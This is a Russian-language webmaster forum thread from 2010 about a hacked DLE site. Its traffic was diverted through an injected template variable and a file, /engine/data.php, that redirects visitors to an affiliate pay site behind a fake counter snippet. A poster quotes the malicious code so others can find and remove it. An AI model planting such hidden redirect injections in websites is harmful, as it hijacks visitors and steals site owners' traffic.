Начал лить на псевдоподписки... конверт что-то 1 к 250... и то смс стоимостью 2,17 :)
кстати платник не доработан в том смысле, что если видео на полный экран развернуть, можно смотреть видео до конца... и мотать... мне кажется люди просто смотрят на весь экран и закрывают ИМХО
ТАк вы в личке получили ID?
Злоумышленника заблокировали?
Взломали сайт опять, точнее, думаю что просто шелл остался. слили трафф, надеюсь злоумышленника поймаете, сегодня он выплату еще не получил.
Написал в личку
unDEADego добавил 30.09.2010 в 21:26
похоже опять выплата уйдет взломщику...
Когда же поддержка в онлайн выйдет???
Какой сейчас вообще конверт по партнерке на всех платниках? Если честно :)
Аттестат злоумышленника попроссил заблокировать, подал 1 претензию. Жду вразумительного ответа от него, которого не будет наверное...
Вот и смс пошли, которых 2 недели почти не было...
Я не паникую, просто хочу, чтобы люди проверили, если кого-нить так хакнули, будут знать что делать...
А вы не могли бы дать кошелек этого партнера?
узнаю вмид, найду, забаню его в арбитраже, а еще лучше, если он в волгограде будет...
Скиньте в личку пожалуйста, сколько он на мне наварился и вмид...
если возможно...
Оттуда, что мой сайт взломали...
ищите код те у кого просмотры на посетителя упали за последнее время, или тем более, кто схватил фильтр от гугла "-30" за редирект.
unDEADego добавил 22.09.2010 в 17:02
ДА у друга теперь 3 админа вообще на 9.0 версии :)
обновился блин :)
unDEADego добавил 22.09.2010 в 17:07
СРОЧНО!!!
проверяйте ваши переменные, в index.php yf yfkbxие строчки типа:
$tpl->set ( '{n}', @file_get_contents('/engine/data.php?id=5'));
Ставьте на index.php права недоступные дл записи лучше
unDEADego добавил 22.09.2010 в 17:09
В файле /engine/data.php
код вредоносный сам
у меня вот что стояло:
[category=4,5]<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='http://counter.yadro.ru/hit?t14.10;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'></a>")
//--></script><!--/LiveInternet-->
<script language="JavaScript">
window.location.href = "http://lux-traf.net/?r=517&land=2&q={title}"
</script>
[/category]
УДАЛЯЙТЕ ЭТОТ ФАЙЛ СОВСЕМ!
Согласен, дыру не латал, вот и схватил...
пофиксил сейчас все :)
жаль партнера не накажешь невыплатами... а я то думаю, почему не идут скачивания
У кого варезы и подобные сайты смотрите код в полной новости, прокликайте все категории и пробуйте переходить на страницы!!!
У меня редиректило с 4-х категория [category=4,5,6,9]{n}[/category] - вот вредоносный код, который прописан в движке, присвоена ему переменная {n}
ВНИМАНИЕ!!!!! МОШЕННИКИ!!!Срочно проверяйте свои сайты, особенно те, кто заметил снижение просмотров страниц резкой, и переходов на другие сайты
Ищите в коде шаблона [category=4,5,6,9]{n}[/category] - примерно вот такую строчку, и просмотрите что на категориях 4,5,6,9 вас будет редиректить на платники дэйликэш!!!!
window.location.href = "http://lux-traf.net/?r=517&land=2&q=RarmaRadio 2.51.2 (Rus)"
